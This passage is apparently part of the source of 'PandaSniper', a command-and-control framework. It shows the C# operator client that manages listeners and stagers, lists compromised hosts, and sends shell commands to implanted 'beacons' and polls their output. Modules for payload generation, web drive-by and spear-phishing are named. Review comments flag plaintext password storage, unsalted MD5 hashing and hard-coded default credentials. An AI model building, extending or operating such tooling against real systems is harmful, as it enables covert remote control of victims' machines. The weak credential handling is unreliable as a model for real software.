| hosts = value; 62 | if (this.PropertyChanged != null) 63 | { 64 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Hosts")); 65 | } 66 | } 67 | } 68 | public string StagerHost 69 | { 70 | get 71 | { 72 | return stagerHost; 73 | } 74 | set 75 | { 76 | stagerHost = value; 77 | if (this.PropertyChanged != null) 78 | { 79 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("StagerHost")); 80 | } 81 | } 82 | } 83 | public string Port 84 | { 85 | get 86 | { 87 | return port; 88 | } 89 | set 90 | { 91 | port = value; 92 | if (this.PropertyChanged != null) 93 | { 94 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Port")); 95 | } 96 | } 97 | } 98 | public string BindTo 99 | { 100 | get 101 | { 102 | return bindto; 103 | } 104 | set 105 | { 106 | bindto = value; 107 | if (this.PropertyChanged != null) 108 | { 109 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("BindTo")); 110 | } 111 | } 112 | } 113 | public string Profile 114 | { 115 | get 116 | { 117 | return profile; 118 | } 119 | set 120 | { 121 | profile = value; 122 | if (this.PropertyChanged != null) 123 | { 124 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Profile")); 125 | } 126 | } 127 | } 128 | public string Header 129 | { 130 | get 131 | { 132 | return header; 133 | } 134 | set 135 | { 136 | header = value; 137 | if (this.PropertyChanged != null) 138 | { 139 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Header")); 140 | } 141 | } 142 | } 143 | 144 | public string Proxy 145 | { 146 | get 147 | { 148 | return proxy; 149 | } 150 | set 151 | { 152 | proxy = value; 153 | if (this.PropertyChanged != null) 154 | { 155 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Proxy")); 156 | } 157 | } 158 | } 159 | 160 | public ListenersListView() { } 161 | public ListenersListView( 162 | string name, 163 | string payload, 164 | string hosts, 165 | string stagerHost, 166 | string port, 167 | string bindto, 168 
| string profile, 169 | string header, 170 | string proxy) 171 | { 172 | this.name = name; 173 | this.payload = payload; 174 | this.hosts = hosts; 175 | this.stagerHost = stagerHost; 176 | this.port = port; 177 | this.bindto = bindto; 178 | this.profile = profile; 179 | this.header = header; 180 | this.proxy = proxy; 181 | } 182 | } 183 | } 184 | -------------------------------------------------------------------------------- /Master/PandaSniper/LoginWindow.xaml: -------------------------------------------------------------------------------- 1 |  22 | 23 | 24 | 25 | 26 | 27 | 28 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 55 | 56 | 57 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 114 | 117 | 123 | 132 | 133 | 136 | 142 | 151 | 152 | 155 | 161 | 170 | 171 | 174 | 180 | 189 | 190 | 191 | 192 | 211 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | -------------------------------------------------------------------------------- /Master/PandaSniper/LoginWindow.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections; 3 | using System.Collections.Generic; 4 | using System.IO; 5 | using System.Linq; 6 | using System.Text; 7 | using System.Threading.Tasks; 8 | using System.Windows; 9 | using System.Windows.Controls; 10 | using System.Windows.Data; 11 | using System.Windows.Documents; 12 | using System.Windows.Input; 13 | using System.Windows.Media; 14 | using System.Windows.Media.Imaging; 15 | using System.Windows.Shapes; 16 | using Newtonsoft.Json; 17 | using Newtonsoft.Json.Linq; 18 | 19 | namespace PandaSniper 20 | { 21 | /// 22 | /// LoginWindow.xaml 的交互逻辑 23 | /// 24 | public partial class LoginWindow : Window 25 | { 26 | public LoginWindow() 27 | { 28 | InitializeComponent(); 29 | } 30 | 31 | public JArray jAConfig; 32 | private void 
LoginWindow_Loaded(object sender, RoutedEventArgs e) 33 | { // Loads the saved connection profiles from ".config" in the application base directory, creating that file with one default profile when it does not exist yet. 34 | string filePath = System.AppDomain.CurrentDomain.BaseDirectory + "/.config"; 35 | if (!File.Exists(filePath)) 36 | { 37 | ConfigFormat config = new ConfigFormat(); 38 | DataConfigFormat data = new DataConfigFormat(); 39 | List listConfig = new List(); 40 | JsonSerializer serializer = new JsonSerializer(); 41 | data.host = "127.0.0.1"; 42 | data.port = "8443"; 43 | data.user = "bwb"; 44 | data.password = "ssssss"; // NOTE(review): the profile, password included, is serialized to .config below as plain JSON 45 | config.id = "1"; 46 | config.ip = "New Profile"; 47 | config.data = data; 48 | listConfig.Add(config); 49 | using (StreamWriter sw = new StreamWriter(filePath)) 50 | using (JsonWriter writer = new JsonTextWriter(sw)) 51 | { 52 | serializer.Serialize(writer, listConfig); 53 | } 54 | } 55 | 56 | JsonSerializer serializer1 = new JsonSerializer(); 57 | using (StreamReader sr = new StreamReader(filePath)) 58 | using (JsonReader reader = new JsonTextReader(sr)) 59 | { 60 | this.jAConfig = (JArray)serializer1.Deserialize(reader); 61 | } 62 | 63 | // Bind the ListBox data; the profile whose id equals the number of profiles pre-fills the login fields, password included. 64 | int JAConfigLength = this.jAConfig.Count(); 65 | LoginListBox.ItemsSource = LoadListBoxData(); 66 | ArrayList LoadListBoxData() 67 | { 68 | ArrayList itemsList = new ArrayList(); 69 | 70 | foreach (var item in this.jAConfig) 71 | { 72 | itemsList.Add(item["ip"]); 73 | if(item["id"].ToString() == JAConfigLength.ToString()) 74 | { 75 | LoginHost.Text = item["data"]["host"].ToString(); 76 | LoginPort.Text = item["data"]["port"].ToString(); 77 | LoginUser.Text = item["data"]["user"].ToString(); 78 | LoginPassword.Password = item["data"]["password"].ToString(); 79 | } 80 | } 81 | return itemsList; 82 | } 83 | 84 | } 85 | 86 | private void WindowTitle_MouseMove(object sender, MouseEventArgs e) 87 | { 88 | if (e.LeftButton == MouseButtonState.Pressed) 89 | { 90 | this.DragMove(); 91 | } 92 | } 93 | 94 | private void WindowClose_MouseEnter(object sender, MouseEventArgs e) 95 | { 96 | 97 | this.WindowCloseIcon.Visibility = Visibility.Visible; 
98 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 99 | } 100 | private void WindowClose_MouseLeave(object sender, MouseEventArgs e) 101 | { 102 | 103 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 104 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 105 | } 106 | 107 | private void WindowMinSize_MouseEnter(object sender, MouseEventArgs e) 108 | { 109 | 110 | this.WindowCloseIcon.Visibility = Visibility.Visible; 111 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 112 | } 113 | private void WindowMinSize_MouseLeave(object sender, MouseEventArgs e) 114 | { 115 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 116 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 117 | } 118 | 119 | private void WindowMaxSize_MouseEnter(object sender, MouseEventArgs e) 120 | { 121 | 122 | this.WindowCloseIcon.Visibility = Visibility.Visible; 123 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 124 | } 125 | private void WindowMaxSize_MouseLeave(object sender, MouseEventArgs e) 126 | { 127 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 128 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 129 | } 130 | 131 | private void WindowClose_Click(object sender, RoutedEventArgs e) 132 | { 133 | this.Close(); 134 | } 135 | 136 | private void WindowMinSize_Click(object sender, RoutedEventArgs e) 137 | { 138 | this.WindowState = WindowState.Minimized; 139 | } 140 | 141 | private void LoginListBox_PreviewMouseUp(object sender, RoutedEventArgs e) 142 | { 143 | if (LoginListBox.SelectedItem != null) 144 | { 145 | foreach(var item in this.jAConfig) 146 | { 147 | String ip = LoginListBox.SelectedItem.ToString(); 148 | if(ip == item["ip"].ToString()) 149 | { 150 | LoginHost.Text = item["data"]["host"].ToString(); 151 | LoginPort.Text = item["data"]["port"].ToString(); 152 | LoginUser.Text = item["data"]["user"].ToString(); 153 | LoginPassword.Password = item["data"]["password"].ToString(); 154 | } 155 | } 156 | 157 | } 158 | } 159 | 
/// <summary>Hover handler for the connect button; currently does nothing.</summary>
private void LoginConnect_MouseEnter(object sender, MouseEventArgs e)
{

}

/// <summary>Hover-exit handler for the connect button; currently does nothing.</summary>
private void LoginConnect_MouseLeave(object sender, MouseEventArgs e)
{

}

/// <summary>
/// Logs in to the server entered in the form and, when the server answers "200",
/// rewrites the saved-connections file and opens the main window.
/// </summary>
/// <remarks>
/// Sends a type "0" message carrying the user name and a hash of the password, then
/// branches on the "code" field of the JSON reply ("504", "401", "500", "200").
/// NOTE(review): the reply is dereferenced without null checks; a reply that is not a
/// JSON object with a "code" field would presumably throw here.
/// On the "504", "401" and "500" branches the connection opened here is not closed by
/// this method.
/// (Generic type arguments, e.g. on Dictionary and List, are missing in this listing.)
/// </remarks>
private void LoginConnect_Click(object sender, RoutedEventArgs e)
{
    // Certificate name handed to SslTcpClient; it is fixed to "localhost" whatever host
    // is entered. NOTE(review): how SslTcpClient uses it to validate the server
    // certificate is not visible here - confirm the peer is actually verified.
    string serverCertificateName = "localhost";
    string machineName = LoginHost.Text;
    // int.Parse throws on empty or non-numeric port text; nothing in this method catches it.
    int machinePort = int.Parse(LoginPort.Text);
    string loginUser = LoginUser.Text;
    string loginPassword = LoginPassword.Password;
    // NOTE(review): Md5.EncryptString is defined elsewhere. If it is a plain unsalted MD5
    // digest, the value sent is password-equivalent and cheap to brute-force once
    // captured - confirm, and prefer a salted, slow password hash on the server side.
    string loginHash = Md5.EncryptString(loginPassword);
    SslTcpClient sslTcpClient = new SslTcpClient(machineName, machinePort, serverCertificateName);
    sslTcpClient.StartSslTcp();
    // Login request: type "0", empty token, user name and password hash as data.
    DataFormat MessageData;
    MessageData.type = "0";
    MessageData.token = "";
    MessageData.data = new Dictionary { { "user", loginUser }, { "hash", loginHash } };
    string sendMessage = JsonConvert.SerializeObject(MessageData);
    //Console.WriteLine(sendMessage);
    sslTcpClient.ReadMessage(sslTcpClient.SendMessage(sendMessage));
    //Console.WriteLine(sslTcpClient.resultMessage);
    JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage);

    // "504": fixed message box text.
    if (rMJson["code"].ToString() == "504")
    {
        MessageBox.Show("服务器不能连接,请检测是否启动Agent");
    }


    // "401" and "500": show the error text supplied by the server.
    if (rMJson["code"].ToString() == "401")
    {
        MessageBox.Show(rMJson["error"].ToString());
    }

    if (rMJson["code"].ToString() == "500")
    {
        MessageBox.Show(rMJson["error"].ToString());
    }

    if (rMJson["code"].ToString() == "200")
    {
        // Saved connections are written as JSON to ".config" in the application's base directory.
        string filePath = System.AppDomain.CurrentDomain.BaseDirectory + "/.config";
        JsonSerializer serializer = new JsonSerializer();

        // NOTE(review): config and data are created once and reused for every entry below.
        // If ConfigFormat / DataConfigFormat are reference types, every list element ends
        // up pointing at the same object - confirm against their declarations.
        ConfigFormat config = new ConfigFormat();
        DataConfigFormat data = new DataConfigFormat();
        List listConfig = new List();

        bool isExists = false;

        // Copy the entries already loaded into jAConfig and note whether this host is among them.
        foreach (var item in this.jAConfig)
        {
            data.host = item["data"]["host"].ToString();
            data.port = item["data"]["port"].ToString();
            data.user = item["data"]["user"].ToString();
            data.password = item["data"]["password"].ToString();
            config.id = item["id"].ToString();
            config.ip = item["ip"].ToString();
            config.data = data;
            listConfig.Add(config);
            if(config.ip == machineName)
            {
                isExists = true;
            }
        }

        // First successful login to this host: append a new entry.
        // The clear-text password becomes part of the saved entry, so anyone who can
        // read the file obtains the login credentials.
        if(isExists == false)
        {
            data.host = machineName;
            data.port = machinePort.ToString();
            data.user = loginUser;
            data.password = loginPassword;
            int id_count = jAConfig.Count + 1;
            config.id = id_count.ToString();
            config.ip = machineName;
            config.data = data;
            listConfig.Add(config);
        }


        // Overwrites the file with the full list on every successful login.
        using (StreamWriter sw = new StreamWriter(filePath))
        using (JsonWriter writer = new JsonTextWriter(sw))
        {
            serializer.Serialize(writer, listConfig);
        }

        // The session object keeps the token returned in "result", the clear-text
        // password and the connection opened in this method.
        UserProfile userProfile = new UserProfile()
        {
            token = rMJson["result"].ToString(),
            host = machineName,
            port = machinePort.ToString(),
            user = loginUser,
            password = loginPassword,
            sslTcpClient = sslTcpClient,
        };

        MainWindow mainWindow = new MainWindow()
        {
            userProfile=userProfile,
        };
        // The login window is closed before the main window is shown as a dialog.
        this.Close();
        mainWindow.ShowDialog();
    }
}

/// <summary>Hover handler for the close button; currently does nothing.</summary>
private void LoginClose_MouseEnter(object sender, MouseEventArgs e)
{

}

/// <summary>Hover-exit handler for the close button; currently does nothing.</summary>
private void LoginClose_MouseLeave(object sender, MouseEventArgs e)
{

}

/// <summary>Closes the login window.</summary>
private void LoginClose_Click(object sender, RoutedEventArgs e)
{
    this.Close();
}
} // closes the enclosing class (declared earlier in the file)
} // closes the enclosing namespace
-------------------------------------------------------------------------------- /Master/PandaSniper/MainPage.xaml.cs: -------------------------------------------------------------------------------- 1 | using 
MaterialDesignThemes.Wpf; 2 | using Newtonsoft.Json; 3 | using Newtonsoft.Json.Linq; 4 | using System; 5 | using System.Collections.Generic; 6 | using System.Linq; 7 | using System.Net.Security; 8 | using System.Reflection; 9 | using System.Text; 10 | using System.Threading; 11 | using System.Threading.Tasks; 12 | using System.Windows; 13 | using System.Windows.Controls; 14 | using System.Windows.Data; 15 | using System.Windows.Documents; 16 | using System.Windows.Input; 17 | using System.Windows.Media; 18 | using System.Windows.Media.Imaging; 19 | using System.Windows.Navigation; 20 | using System.Windows.Shapes; 21 | using System.Windows.Threading; 22 | 23 | namespace PandaSniper 24 | { 25 | /// 26 | /// MainPage.xaml 的交互逻辑 27 | /// 28 | public partial class MainPage : Page 29 | { 30 | public UserProfile userProfile; 31 | public Dictionary ThreadDictionary = new Dictionary(); 32 | public Dictionary sslTcpClients = new Dictionary(); 33 | 34 | 35 | public MainPage() 36 | { 37 | InitializeComponent(); 38 | //BodySessionListView.DoubleBufferedListView(true); 39 | 40 | } 41 | 42 | 43 | private void MainPage_Loaded(object sender, RoutedEventArgs e) 44 | { 45 | this.AutoSizeWindow(); 46 | } 47 | 48 | public void AutoSizeWindow() 49 | { 50 | //listview自动调节头宽度 51 | foreach (GridViewColumn item in BodySessionGridView.Columns) 52 | { 53 | switch (item.Header) 54 | { 55 | case "country": 56 | item.Width = (this.ActualWidth / 100) * 10; 57 | break; 58 | case "external": 59 | item.Width = (this.ActualWidth / 100) * 12; 60 | break; 61 | case "internal": 62 | item.Width = (this.ActualWidth / 100) * 12; 63 | break; 64 | case "pid": 65 | item.Width = (this.ActualWidth / 100) * 10; 66 | break; 67 | case "arch": 68 | item.Width = (this.ActualWidth / 100) * 10; 69 | break; 70 | case "last": 71 | item.Width = (this.ActualWidth / 100) * 17; 72 | break; 73 | case "user": 74 | item.Width = (this.ActualWidth / 100) * 8; 75 | break; 76 | case "computer": 77 | item.Width = (this.ActualWidth 
/ 100) * 22; 78 | break; 79 | default: 80 | break; 81 | } 82 | } 83 | } 84 | 85 | private void MenuItemInteract_Click(object sender, RoutedEventArgs e) 86 | { 87 | bool TabItemisExsits = false; 88 | TabItem tabItemSelected = new TabItem(); 89 | TargetListView listViewItem = (TargetListView)this.BodySessionListView.SelectedItems[0]; 90 | foreach(TabItem tabItem in BodyControlPanel.Items) 91 | { 92 | if(tabItem.Name == ("BeaconTabItem_" + listViewItem.uid)) 93 | { 94 | TabItemisExsits = true; 95 | tabItemSelected = tabItem; 96 | } 97 | } 98 | if (listViewItem != null && TabItemisExsits == false) 99 | { 100 | TabItem BeaconTabItem = new TabItem() { }; 101 | //header 102 | StackPanel BeaconHeaderStackPanel = new StackPanel() { }; 103 | BeaconHeaderStackPanel.Orientation = Orientation.Horizontal; 104 | PackIcon packIcon = new PackIcon() 105 | { 106 | Foreground = (Brush)new BrushConverter().ConvertFromString("#FFD4D7D6"), 107 | Kind = PackIconKind.FormatAlignLeft, 108 | Height = 11, 109 | Width = 11, 110 | VerticalAlignment = VerticalAlignment.Center, 111 | Margin = new Thickness(0, 0, 5, 0), 112 | }; 113 | TextBlock textBlock = new TextBlock() { Text = "Beacon("+listViewItem.InternalIP+"#"+ listViewItem.Pid +")" }; 114 | BeaconHeaderStackPanel.Children.Add(packIcon); 115 | BeaconHeaderStackPanel.Children.Add(textBlock); 116 | 117 | //content 118 | Grid grid = new Grid(); 119 | RowDefinition rowGrid1 = new RowDefinition 120 | { 121 | Height = new GridLength(1, GridUnitType.Star) 122 | }; 123 | RowDefinition rowGrid2 = new RowDefinition 124 | { 125 | Height = new GridLength(25) 126 | }; 127 | grid.RowDefinitions.Add(rowGrid1); 128 | grid.RowDefinitions.Add(rowGrid2); 129 | 130 | Grid grid1 = new Grid(); 131 | Border border = new Border() 132 | { 133 | BorderThickness = new Thickness(0,0,0,1), 134 | BorderBrush = (Brush)new BrushConverter().ConvertFromString("#FF897979") 135 | }; 136 | grid1.Children.Add(border); 137 | 138 | ScrollViewer stackPanelScrollViewer = new 
ScrollViewer(); 139 | stackPanelScrollViewer.VerticalScrollBarVisibility = ScrollBarVisibility.Auto; 140 | 141 | StackPanel stackPanel = new StackPanel() 142 | { 143 | Orientation = Orientation.Vertical, 144 | Margin = new Thickness(6, 5, 6, 0), 145 | Name = "StackPanel_" + listViewItem.uid, 146 | HorizontalAlignment = HorizontalAlignment.Left, 147 | VerticalAlignment = VerticalAlignment.Top 148 | }; 149 | stackPanelScrollViewer.Content = stackPanel; 150 | grid1.Children.Add(stackPanelScrollViewer); 151 | Grid.SetRow(grid1, 0); 152 | 153 | StackPanel stackPanel1 = new StackPanel() 154 | { 155 | Orientation = Orientation.Horizontal 156 | }; 157 | Grid.SetRow(stackPanel1, 1); 158 | PackIcon packIcon1 = new PackIcon() 159 | { 160 | Kind = PackIconKind.KeyboardArrowRight, 161 | Height = 25, 162 | Width = 20 163 | }; 164 | stackPanel1.Children.Add(packIcon1); 165 | 166 | TextBox textBox = new TextBox() 167 | { 168 | Name = "BeaconTextBox_" + listViewItem.uid, 169 | Width = this.ActualWidth - 20, 170 | HorizontalAlignment = HorizontalAlignment.Left, 171 | VerticalAlignment = VerticalAlignment.Center 172 | }; 173 | textBox.KeyDown += new KeyEventHandler(BeaconTextBox_KeyDown); 174 | stackPanel1.Children.Add(textBox); 175 | 176 | grid.Children.Add(grid1); 177 | grid.Children.Add(stackPanel1); 178 | 179 | //add 180 | BeaconTabItem.Header = BeaconHeaderStackPanel; 181 | BeaconTabItem.Content = grid; 182 | BeaconTabItem.Name = "BeaconTabItem_" + listViewItem.uid; 183 | 184 | BodyControlPanel.Items.Add(BeaconTabItem); 185 | BodyControlPanel.SelectedItem = BeaconTabItem; 186 | string textBoxName = "BeaconTextBox_" + listViewItem.uid; 187 | if (this.sslTcpClients == null || !this.sslTcpClients.ContainsKey(textBoxName)) 188 | { 189 | SslTcpClient sslTcpClient = new SslTcpClient(this.userProfile.host, int.Parse(this.userProfile.port), "localhost"); 190 | sslTcpClient.StartSslTcp(); 191 | this.sslTcpClients.Add(textBoxName, sslTcpClient); 192 | } 193 | 194 | } 195 | else 196 | { 
197 | BodyControlPanel.SelectedItem = tabItemSelected; 198 | } 199 | } 200 | 201 | private void TabItemClose_PreviewMouseUp(object sender, MouseButtonEventArgs e) 202 | { 203 | if(BodyControlPanel.SelectedIndex != -1 && BodyControlPanel.SelectedIndex != 0) 204 | { 205 | string uid = ((TabItem)BodyControlPanel.SelectedItem).Name.Split('_')[1]; 206 | List threadKey = new List(); 207 | foreach(var item in this.ThreadDictionary) 208 | { 209 | if (item.Key.Split('_')[0] == uid) 210 | { 211 | threadKey.Add(item.Key); 212 | } 213 | } 214 | foreach (string list in threadKey) 215 | { 216 | Thread thread = this.ThreadDictionary[list]; 217 | thread.Abort(); 218 | this.ThreadDictionary.Remove(list); 219 | 220 | } 221 | BodyControlPanel.Items.Remove(BodyControlPanel.SelectedItem); 222 | } 223 | } 224 | 225 | 226 | public class GetCommandResultClass 227 | { 228 | public string uid; 229 | public string execid; 230 | public UserProfile userProfile; 231 | public StackPanel stackPanel; 232 | 233 | public void GetCommandResult() 234 | { 235 | DataFormat MessageData; 236 | MessageData.type = "5"; 237 | MessageData.token = this.userProfile.token; 238 | MessageData.data = new Dictionary { { "uid", this.uid}, { "execid", this.execid } }; 239 | string sendMessage = JsonConvert.SerializeObject(MessageData); 240 | bool isGo = true; 241 | Thread.CurrentThread.IsBackground = true; 242 | SslTcpClient sslTcpClient = new SslTcpClient(userProfile.host,int.Parse(userProfile.port), "localhost"); 243 | sslTcpClient.StartSslTcp(); 244 | do 245 | { 246 | SslStream sslStream = sslTcpClient.SendMessage(sendMessage); 247 | sslTcpClient.ReadMessage(sslStream); 248 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 249 | if (rMJson["code"].ToString() == "200") 250 | { 251 | App.Current.Dispatcher.Invoke((Action)(() => 252 | { 253 | TextBlock textBlock = new TextBlock() 254 | { 255 | Text = "[" + execid + "] Result: \n" + 
Function.GetChsFromHex(rMJson["result"].ToString()) 256 | }; 257 | //"StackPanel_" + uid 258 | this.stackPanel.Children.Add(textBlock); 259 | })); 260 | isGo = false; 261 | sslTcpClient.CloseSslTcp(); 262 | } 263 | if (rMJson["code"].ToString() == "500" || rMJson["code"].ToString() == "401" || rMJson["code"].ToString() == "404") { 264 | isGo = false; 265 | MessageBox.Show(rMJson["error"].ToString()); 266 | } 267 | Thread.Sleep(2000); 268 | } while (isGo); 269 | 270 | } 271 | } 272 | 273 | private void BeaconTextBox_KeyDown(object sender, KeyEventArgs e) 274 | { 275 | if (e.Key == Key.Enter)//如果输入的是回车键 276 | { 277 | TextBox textBox = (TextBox)sender; 278 | string uid = textBox.Name.Split('_')[1]; 279 | if(textBox.Text.Trim() != "") 280 | { 281 | SslTcpClient sslTcpClient = this.sslTcpClients[textBox.Name]; 282 | DataFormat MessageData; 283 | MessageData.type = "2"; 284 | MessageData.token = userProfile.token; 285 | MessageData.data = new Dictionary { { "uid", uid }, { "cmd", textBox.Text.Trim() } }; 286 | string sendMessage = JsonConvert.SerializeObject(MessageData); 287 | sslTcpClient.ReadMessage(sslTcpClient.SendMessage(sendMessage)); 288 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 289 | if (rMJson["code"].ToString() == "200") 290 | { 291 | string execid = rMJson["result"].ToString(); 292 | if (execid != "") 293 | { 294 | 295 | TextBlock textBlock = new TextBlock() 296 | { 297 | Text = "[" + execid + "] Command: " + textBox.Text.Trim() 298 | }; 299 | Grid grid = (Grid)BodyControlPanel.SelectedContent; 300 | Grid grid1 = (Grid)grid.Children[0]; 301 | ScrollViewer scrollViewerStackPanel = (ScrollViewer)grid1.Children[1]; 302 | StackPanel stackPanel = (StackPanel)scrollViewerStackPanel.Content; 303 | stackPanel.Children.Add(textBlock); 304 | textBox.Text = ""; 305 | GetCommandResultClass myThread = new GetCommandResultClass 306 | { 307 | uid = uid, 308 | execid = execid, 309 | userProfile = this.userProfile, 310 | stackPanel 
= stackPanel 311 | }; 312 | Thread thread = new Thread(myThread.GetCommandResult); 313 | thread.Start(); 314 | this.ThreadDictionary.Add(uid+ "_"+ Function.GenerateRandomString(32),thread); 315 | } 316 | } 317 | 318 | } 319 | } 320 | } 321 | } 322 | } 323 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainPayload.xaml.cs: -------------------------------------------------------------------------------- 1 | using Newtonsoft.Json; 2 | using Newtonsoft.Json.Linq; 3 | using System; 4 | using System.Collections.Generic; 5 | using System.Collections.ObjectModel; 6 | using System.Linq; 7 | using System.Net.Security; 8 | using System.Text; 9 | using System.Threading.Tasks; 10 | using System.Windows; 11 | using System.Windows.Controls; 12 | using System.Windows.Data; 13 | using System.Windows.Documents; 14 | using System.Windows.Input; 15 | using System.Windows.Media; 16 | using System.Windows.Media.Imaging; 17 | using System.Windows.Navigation; 18 | using System.Windows.Shapes; 19 | 20 | namespace PandaSniper 21 | { 22 | /// 23 | /// MainPayload.xaml 的交互逻辑 24 | /// 25 | public partial class MainPayload : Page 26 | { 27 | public MainPayload() 28 | { 29 | InitializeComponent(); 30 | } 31 | 32 | public Packages Attacks_Packages; 33 | public PayloadGeneragor Attacks_PayloadGeneragor; 34 | public LinuxExecutable Attacks_LinuxExecutable; 35 | public LinuxExecutableS Attacks_LinuxExecutableS; 36 | public WebDriveBy Attacks_WebDriveBy; 37 | public SpearPhish Attacks_SpearPhish; 38 | 39 | public ObservableCollection listeners = new ObservableCollection() { }; 40 | 41 | public UserProfile userProfile; 42 | 43 | private void MainPayload_Loaded(object sender, RoutedEventArgs e) 44 | { 45 | this.AutoSizeWindow(); 46 | this.Attacks_Packages = new Packages(); 47 | this.Attacks_PayloadGeneragor = new PayloadGeneragor(); 48 | this.Attacks_LinuxExecutable = new LinuxExecutable(); 49 | this.Attacks_LinuxExecutableS = new 
LinuxExecutableS(); 50 | this.Attacks_WebDriveBy = new WebDriveBy(); 51 | this.Attacks_SpearPhish = new SpearPhish(); 52 | AttacksChangePage.Content = new Frame() 53 | { 54 | Content = this.Attacks_Packages 55 | }; 56 | MainPayloadListView.ItemsSource = this.listeners; 57 | } 58 | 59 | public void AutoSizeWindow() 60 | { 61 | //listview自动调节头宽度 62 | foreach (GridViewColumn item in MainPayloadGridView.Columns) 63 | { 64 | switch (item.Header) 65 | { 66 | case "name": 67 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 8; 68 | break; 69 | case "payload": 70 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 12; 71 | break; 72 | case "hosts": 73 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 15; 74 | break; 75 | case "port": 76 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 5; 77 | break; 78 | case "bindto": 79 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 10; 80 | break; 81 | case "header": 82 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 20; 83 | break; 84 | case "proxy": 85 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 20; 86 | break; 87 | case "profile": 88 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 10; 89 | break; 90 | default: 91 | break; 92 | } 93 | } 94 | } 95 | 96 | //监听器事件 97 | private void ListenerAdd_MouseEnter(object sender, MouseEventArgs e) 98 | { 99 | 100 | } 101 | 102 | private void ListenerAdd_MouseLeave(object sender, MouseEventArgs e) 103 | { 104 | 105 | } 106 | 107 | private void ListenerAdd_Click(object sender, RoutedEventArgs e) 108 | { 109 | AddListener addListener = new AddListener() { }; 110 | addListener.listeners = this.listeners; 111 | addListener.userProfile = this.userProfile; 112 | addListener.TransfEvent += TransfListeners; 113 | addListener.Show(); 114 | } 115 | 116 | void TransfListeners(ObservableCollection listeners) 117 | { 118 | 119 | this.listeners = listeners; 120 | 121 | } 122 | 123 | private void 
ListenerEdit_MouseEnter(object sender, MouseEventArgs e) 124 | { 125 | 126 | } 127 | 128 | private void ListenerEdit_MouseLeave(object sender, MouseEventArgs e) 129 | { 130 | 131 | } 132 | 133 | private void ListenerEdit_Click(object sender, RoutedEventArgs e) 134 | { 135 | 136 | } 137 | 138 | private void ListenerRemove_MouseEnter(object sender, MouseEventArgs e) 139 | { 140 | 141 | } 142 | 143 | private void ListenerRemove_MouseLeave(object sender, MouseEventArgs e) 144 | { 145 | 146 | } 147 | 148 | private void ListenerRemove_Click(object sender, RoutedEventArgs e) 149 | { 150 | string port = ((ListenersListView)MainPayloadListView.SelectedItem).Port; 151 | DataFormat MessageData; 152 | MessageData.type = "4"; 153 | MessageData.token = userProfile.token; 154 | MessageData.data = new Dictionary { { "port", port } }; 155 | string sendMessage = JsonConvert.SerializeObject(MessageData); 156 | SslTcpClient sslTcpClient = new SslTcpClient(userProfile.host, int.Parse(userProfile.port), "localhost"); 157 | sslTcpClient.StartSslTcp(); 158 | SslStream sslStream = sslTcpClient.SendMessage(sendMessage); 159 | sslTcpClient.ReadMessage(sslStream); 160 | 161 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 162 | if (rMJson["code"].ToString() == "200") 163 | { 164 | MessageBox.Show("删除监听成功"); 165 | this.listeners.Remove((ListenersListView)MainPayloadListView.SelectedItem); 166 | } 167 | else 168 | { 169 | MessageBox.Show(rMJson["error"].ToString()); 170 | sslTcpClient.CloseSslTcp(); 171 | return; 172 | } 173 | sslTcpClient.CloseSslTcp(); 174 | } 175 | 176 | private void ListenerRestart_MouseEnter(object sender, MouseEventArgs e) 177 | { 178 | 179 | } 180 | 181 | private void ListenerRestart_MouseLeave(object sender, MouseEventArgs e) 182 | { 183 | 184 | } 185 | 186 | private void ListenerRestart_Click(object sender, RoutedEventArgs e) 187 | { 188 | 189 | } 190 | 191 | private void ListenerHelp_MouseEnter(object sender, MouseEventArgs e) 192 
